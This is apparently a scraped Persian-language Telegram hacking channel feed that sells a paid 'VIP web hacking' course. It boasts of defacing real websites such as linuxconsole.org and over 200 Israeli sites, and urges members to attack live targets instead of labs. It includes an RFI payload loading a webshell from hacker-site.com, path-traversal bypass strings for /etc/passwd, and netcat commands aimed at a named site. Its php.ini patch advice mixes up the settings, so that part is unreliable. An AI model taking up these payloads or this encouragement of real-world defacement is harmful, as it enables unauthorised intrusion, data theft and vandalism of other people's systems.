0Day.Today | Learn Exploit | Zero World | Dark web |

پرمیوم تلکرام لینکی(گیفتی) کسی داره؟ خریدارم⚡️ @soltane_sorat

سه نمونه از سایت هایی که توسط ما هک شدن : 1- itpark.mn 2- ago.ac 3- linuxconsole.org در مورد این وب سایت ها میتونید تو ویکی پدیا بخونید : https://en.m.wikipedia.org/wiki/LinuxConsole https://ja.wikipedia.org/wiki/%E6%97%A5%E6%9C%AC%E9%A1%8E%E5%92%AC%E5%90%88%E5%AD%A6%E4%BC%9A لینک زون : https://zone-h.org/mirror/id/41210067 https://www.zone-h.org/mirror/id/41118875 https://zone-h.org/mirror/id/41100666 پس دوستان تو کانال vip نگران دیفیس زدن و اکسس گرفتن نباشن ❤️ برای ثبت نام کانال vip وب هکینگ : @Bvrce t.me/KurtLar0101

دوستان رفقایی که علاقه به وب هکینگ دارن میتونن توی کانال vip ما ثبت نام کنن همونطور که توی عکس های بالا میبینید ما روی cms ها پلاگین ها و... آسیپ پذیری کشف میکنیم و بعد اکسپلویت میکنیم نمونه آسیب پذیری کشف شده همونیه که توی عکس میبینید بالای ۲۰۰ تا سایت اسرائیلی دیف شدن 😁 توی کانال vip شما قراره یاد بگیری که چگونه شل بگیرین دیفیس کنین دیتا دانلود کنین دیتابیس رو بردارین و.... در واقع شما به مرحله ای میرسین که بتونین index سایت رو دیف کنین ارتقا بدین دسترسیتونو مثلا ممکنه بگین مگه میشه با باگ LFD یا RFD شل گرفت ؟ چرا نمیشه انقدر از این تارگتا زدیم توی کانال گذاشتیم که میبینید و بررسیشونم میکنید دوستانی که از طرف ما میرن برای ثبت نام ۱۱۰ تومان تخفیف دارن و قیمت ۷۱۰ تومن درواقع میشه ۶۰۰ تومن براشون ❤️ برای ثبت نام : @Bvrce

پروژه ی جدید ناتکوین فعال شد ⚡️ بازی جدید نات پیکسل ، پروژه ی قدرتمندی هست و بزودی لیست میشه❤️ لینک ربات: @notpixel

درمورد باگ lfi و rfi و نحوه به وجود امدن این باگ ها و نحوه پچ کردنشون Lfi مخفف شده  : Local file inclusion باگ rfi مخفف شده : Remote file inclusion باگ lfi به ما اجازه میدهد سورس فایل های php سایت را فراخوانی و مشاهده کنیم : Site.com/index.php?page=../../database.php مثال خواندن فایل دیتابیس 👆👆 باگ rfi به ما اجازه میدهد که یک فایل txt را که سورس php یا html دارد را در روی هاست دیگر است با کامپایلر php یا html روی هاست تارگت اجرا کند برای مثال : target.com/index.php?page=hacker-site.com/shell.txt همانطور که در مثال بالا میبینید هکر با استفاده از هاست خود یک فایل با سورس php و پسوند text را با کامپایلر php سایت تارگت به صورت ریموت اجرا کند که ممکن است این یک فایل مخرب مثل یک وبشل باشد هنگامی که برنامه نویس از توابع فراخوانی بدون محدودیت یا لیمیت استفاده میکند باگ lfi یا rfi رخ میدهد مثل تابع include برای جلوگیری از باگ lfi و rfi میتوانیم در قسمت $_GET که ورودی میگیریم در سورس php از تابع str_replace استفاده کنیم روش دوم پچ باگ lfi و rfi استفاده از تابع strstr بعد از گرفتن ورودی در سورس php است جلوگیری از باگ lfi و rfi با استفاده از فایل php.ini : برای جلوگیری از باگ rfi باید در فایل php.ini قسمت allow_url_fopen را مساوی با off قرار بدیم برای جلوگیری از باگ lfi از طریق فایل php.ini باید قسمت allow_url_include را در فایل php.ini مساوی با off قرار دهیم استفاده از توابع زیر بدون محدودیت باعث میشود باگ lfi و rfi رخ دهد : include - include_once - requre - requre_ons #hack #Website #Webhacking 〰️〰️〰️〰️〰️〰️ IR0Day.Today Bax T.me/LearnExploit t.me/KurtLar0101

باگ HTTP Smuggling چیه؟ ورژن HTTP/1.0: در نسخه HTTP/1.0 برای هر درخواست HTTP یک اتصال TCP جدید باز می‌شد و پس از دریافت پاسخ، این اتصال بسته می‌شد. این رویکرد باعث افزایش بار روی شبکه و تاخیر بیشتر می‌شد، به خصوص وقتی درخواست‌های متعددی باید پشت سر هم به یک سرور ارسال می‌شد. ورژن HTTP/1.1: در نسخه HTTP/1.1، دو قابلیت کلیدی به پروتکل اضافه شد که باعث بهینه‌سازی اتصال‌ها و کاهش بار شبکه شد:

ویژگی Keep-Alive: این ویژگی اجازه می‌دهد که یک اتصال TCP پس از دریافت پاسخ بسته نشود و برای درخواست‌های بعدی باز بماند. این قابلیت با هدر Connection: keep-alive پیاده‌سازی می‌شود. وقتی از Keep-Alive استفاده می‌شود، کلاینت می‌تواند چندین درخواست HTTP را بدون نیاز به باز و بسته کردن مداوم اتصالات TCP ارسال کند. برای تست این قابلیت می‌توان از دستور زیر استفاده کرد: curl --keepalive-time 10 http://theemi.ir/1 http://theemi.ir/2 این دستور به سرور می‌گوید که اتصال TCP را تا 10 ثانیه باز نگه دارد و سپس بسته شود. ویژگی Pipelining: در این حالت، کلاینت می‌تواند چند درخواست HTTP را به صورت همزمان و پشت سر هم به یک اتصال ارسال کند، بدون اینکه منتظر دریافت پاسخ هر درخواست بماند. پاسخ‌ها نیز به ترتیب ارسال درخواست‌ها از سرور دریافت می‌شوند. برای تست این قابلیت: echo -en "GET /path1 HTTP/1.1\r\nHost: theemi.ir\r\n\r\nGET /path2 HTTP/1.1\r\nHost: theemi.ir\r\n\r\n" | nc theemi.ir 80 در اینجا از nc (Netcat) برای باز کردن یک اتصال TCP روی پورت 80 استفاده می‌شود و دو درخواست HTTP به صورت پیپ‌لاین شده ارسال می‌گردند.

 انواع Transfer-Encoding: این هدر برای کنترل نحوه انتقال داده‌ها در پروتکل HTTP استفاده می‌شود و شامل انواع مختلفی است:

chunked compress deflate gzip identity

مهم‌ترین و پرکاربردترین آن‌ها در این زمینه Chunked است. در انتقال chunked، داده‌ها به قطعات (چانک‌ها) تقسیم شده و به سرور ارسال می‌شوند. هر چانک یک سایز مشخص دارد و با پایان هر چانک، سایز بعدی ارسال می‌شود. این روش معمولاً در ارسال داده‌های آپلودی بزرگ استفاده می‌شود، به طوری که سرور بتواند بدون نیاز به دانستن اندازه کامل محتوا، داده‌ها را دریافت کند. حمله HTTP Request Smuggling: این تکنیک حمله زمانی رخ می‌دهد که یک کلاینت (حمله‌کننده) از تفاوت نحوه پردازش درخواست‌ها بین دو سرور (مثلاً یک سرور Front-end و یک سرور Back-end) استفاده کند تا یک درخواست مخفی یا غیرمجاز را به سرور بک‌اند ارسال کند. برای انجام یک حمله Request Smuggling، حداقل دو سرور در مسیر ارتباط نیاز است:

فرانت‌اند(Front-end server): سروری که مستقیماً به کلاینت سرویس می‌دهد. بک‌اند(Back-end server): سروری که درخواست‌های پردازش‌شده را از فرانت‌اند دریافت می‌کند و پاسخ نهایی را به فرانت‌اند می‌دهد

. ویژگی Keep-Alive و Pipelining بین کلاینت و فرانت‌اند سرور برقرار است، اما بین فرانت‌اند و بک‌اند چنین نیست. فرانت‌اند درخواست‌ها را به بک‌اند ارسال می‌کند، اما بک‌اند نمی‌تواند درخواست‌ها را به درستی پردازش کند زیرا تفاوتی در نحوه پارس کردن درخواست‌ها بین این دو سرور وجود دارد. مراحل حمله: مهاجم دو درخواست به صورت پشت سر هم به فرانت‌اند ارسال می‌کند. فرانت‌اند ممکن است این دو درخواست را یک درخواست در نظر بگیرد و آن را به بک‌اند ارسال کند. بک‌اند که به درستی پارس می‌کند، این دو درخواست را جدا از هم می‌بیند و پاسخ اولین درخواست را به فرانت‌اند ارسال می‌کند. فرانت‌اند این پاسخ را به کلاینت برمی‌گرداند، اما درخواست دوم که در بافر بک‌اند مانده، روی درخواست بعدی قرار می‌گیرد. این باعث می‌شود که مهاجم بتواند روی درخواست بعدی که احتمالاً از کاربر دیگری است، تغییرات ایجاد کند. این تفاوت در نحوه پردازش و پارس کردن درخواست‌ها بین سرورهای فرانت‌اند و بک‌اند، منجر به این حمله می‌شود و می‌تواند امنیت سرور و داده‌های کاربران دیگر را به خطر بیندازد. #hack #Website #Webhacking 〰️〰️〰️〰️〰️〰️ IR0Day.Today Bax T.me/LearnExploit ✍ imem!

🏃‍♂️ آموزش امنیت سایبری با حل چالش ✅ چالش در حوزه های تست نفوذ، فارنزیک، هوش تهدید و مباحث مقدماتی 🔴 رایت آپ حل چالش ها 🔰 برگزاری چالش های آنلاین به صورت Red Time و Blue Time https://t.me/challenginno

باگ xss چه باگیه : باگ xss مخفف شده cross site script هستش و به معنی عبور از اسکریپت سایت میتونیم ترجمش کنیم باگ xss در ورودی سایت ها به وجود میاد جایی که کاربر میتونه چیزی تایپ کنه و بعد سابمیت کنه کجاها ؟ قسمت سرچ که میتونیم چیزی بنویسم و بعد سابمیت کنیم یا قسمت نظرات سایت و... باگ xss یعنی ما از اسکریپت سایت گذر کنیم و کد های html و javascript بتونیم اپلود کنیم خب از طریق سایت xss میشه به اطلاعات کاربرا دسترسی پیدا کرد ؟ باید بگم اره چون کلا این باگ سمت کلاینه همونطور که میدونید یسری از باگ های ما سمت سروره یسریاشون سمت کلاینت ما کلاینت ساید داریم سرور ساید داریم باگ ها به دو دسته تقسیم میشن باگ هایی مثل xss یا csrf سمت کلاینت ساید هستن و حمله csrf از زیرمجموعه های باگ xss هستش و چندین نوع xss داریم : Xss از نوع Reflected معمول ترین روش و رایج ترین نوعح حمله از طریق xss هستش که اسکریپت مخرب به همراه لینک برای قربانی ارسال میشه Xss از نوع stored خطرناک ترین نوع xss هستش که پیلود ما به صورت دائم روی سایت میمونه و هر وقت قربانی از اون قسمت سایت بازدید کنه میتونیم کوکی هارو بدزدیم باگ xss از نوع stored میتونه توی قسمت نظرات مثلا به وجود بیاد حتی با این نوع xss میتونیم سایت رو دیفیس کنیم به صورتی که کد های ما توی سورس خودشونو سیو کنن و دیفیس ما ماندگار باشه و نوع دیگه ای از xss  نوع Dom هستش خب حالا یه بحثی هم میمونه چجوری باید جلوی باگ xss رو بگیریم ؟ میتونیم ورودی هامونو با تابعی به اسم htmlentities() در php  محدود کنیم و در نتیجه جلوی باگ xss رو بگیریم #hack #Website #Webhacking 〰️〰️〰️〰️〰️〰️ IR0Day.Today Bax T.me/LearnExploit t.me/KurtLar0101

درمورد بایپس توی حمله File path traversal : من اینو قبلا درموردش توضیح دادم بازم میگم درمورد بایپس این نوع حمله اولین نکته اینکه توی این حمله به صورت عادی اول تست کنید : /image?filename=../../etc/passwd خب اولین روش بایپس : ....//....//etc/passwd دومین روش بایپس اینکه از دابل یو ار ال اینکود استفاده کنیم سومین روش اینکه مسیر فعلیمونو داشته باشیم بعد به صورت عادی عمل کنیم : /image?filename=/var/www/image/../../etc/passwd چهارمین متود یا همون روش : /image?filename=../../etc/passwd%00.jpg #hack #Website #Webhacking 〰️〰️〰️〰️〰️〰️ IR0Day.Today Bax T.me/LearnExploit t.me/KurtLar0101

دوستان هدف ما همینه که شمارو با واقعیت رو به رو کنیم در واقع هین تارگت های واقعی که روش مانور میدیم باعث میشه شما با دنیای واقعی تست نفوذ اشنایی داشته باشین همیشه ازمایشگاه جواب نیست شما باید به صورت واقعی تارگت بزنی که بتونی چیزی یاد بگیری باید به صورت واقعی بایپس کنی تارگت رو چون تارگت ها مختلفن بایپس ها و پتود ها هم برای هر تارگت ممکنه متفاوت باشه برای ثبت نام دوره وب هکینگ کانال vip به ایدی زیر پیام بدین : @Bvrce

Linuxconsole😂😂😂😂😂 Mirror : https://zone-h.org/mirror/id/41210067 چن ماه پیش یکی از سایتای گنده جهانو زدیم لینوکس کنسول اره سیستم عامل لینوکس کنسولو دیفیس کردیم خواستم بگم تو بحث وب هکینگ توی کانال vip توسط یه مدرسی تدریس میشه که چهارتا سایت درست حسابی زده حرفی برای گفتن داره و خب قراره پاییزو بشینین دیفیس کنین اکسس بگیرین دیتابیس بزنین طعم واقعی وب هکینگ‌ بچشین اینکه سایتای وردپرسی چجوری هک میشن cms ها چجوری اکسپلویت میشن و.... قراره فله ای روی تارگتای واقعی مانور بدیم زون اچ ما : https://zone-h.org/archive/notifier=D4LGH4CK_TM برای ثبت نام تو کانال vip وب هکینگ به ایدی زیر پیام بدین 👇 @Bvrce

قیمت کانال وی ای پی ۷۱۰ تومان است دوستانی که از طرف ما برن برای ثبت نام ۶۰۰ تومن هستش درواقع ۱۱۰ تومن تخفیف رفتید برای ثبت نام بگید از طرف ما اومدین ۱۱۰ تومن تخفیف بگیرین ❤️ برای ثبت نام به این ایدی پیام بدین : @Bvrce

و خب در ویدیو های آموزش سایت های واقعی رو مورد اتک و بررسی قرار میدیم درواقع تارگت داریم برای هر باگی و در دنیای واقعی شما میاید تارگت میزنید و ازمایشگاهی به این شکل نخواهیم داشت اگرم ازمایشگاه هم داشته باشیم برای دو سه تا باگ هست که اگه تارگت واقعی برای اونا پیدا نشه توی ازمایشگاه تست بکنیم و اینکه سایت های وردپرسی رو مورد بررسی قرار میدیم اصلا توی اموزش یاد میدیم چجوری روی یا سایت وردپرسی شل اپلود کنیم هکش کنیم بیشتر تارگت های ما وردپرسیییی هستتد بنده چندین سال در حوضه وب هکینگ فعالیت داشتم شما میتونید از طریق زون اچ کارای بنده رو مورد بررسی قرار بدین : https://zone-h.org/archive/notifier=D4LGH4CK_TM

👑 VIP Channel  👑 😵🤔🙁😝😤☹️🙁☹️ ثبت نام توی کانال وب هکینگ vip برای 6 نفر باز شد فقط برای 6 نفر ثبت نام هست و ثبت نام بعدی معلوم نیست چه تایمی هستش و قراره دوباره ثبت نام بشه یا نه فعلا به 6 ثبت نام داره دوستانی که از قبل میگفتن کی ثبت نام میکنین کی ثبت نام میکنین الان ثبت نام میکنیم کانال vip وب هکینگ ما متفاوت با همه کانال ها هستش ترکیبی از کانال های vip خارجی و ایرانی چجوری ؟ اینطوری که هم توی کانال ابزار هم شل فایندر کرکر اکسپلویت و در کنار اینها اموزش های مربوط به وب هکینگ قرار داده میشه درواقع شما هم آموزش میبینید هم ابزار دارید چیا توی کانال وب هکینگ هستش ؟ انواع کرکر ابزار های مربوط به وب هکینگ شل فایندر اکسپلویت و آموزش های مربوط به وب هکینگ که اینا نمونه اموزش های توی کانال vip وب هکینگ هستش 👇👇👇 t.me/KurtLar0101/489 t.me/KurtLar0101/311 t.me/KurtLar0101/313 t.me/KurtLar0101/315 t.me/KurtLar0101/316 t.me/KurtLar0101/317 t.me/KurtLar0101/330 نمونه ابزار هایی که توی کانال vip قرار داده شده : t.me/KurtLar0101/377 t.me/KurtLar0101/393 قیمت ۷۱۰ تومان برای تهیه vip پیام بدین :@Bvrce

Xpath Injection Admin Bypass #hack #Website #Webhacking 〰️〰️〰️〰️〰️〰️ IR0Day.Today Bax T.me/LearnExploit t.me/KurtLar0101

Xpath Injection -- Admin Bypass -- Shell Upload #hack #Website #Webhacking 〰️〰️〰️〰️〰️〰️ IR0Day.Today Bax T.me/LearnExploit t.me/KurtLar0101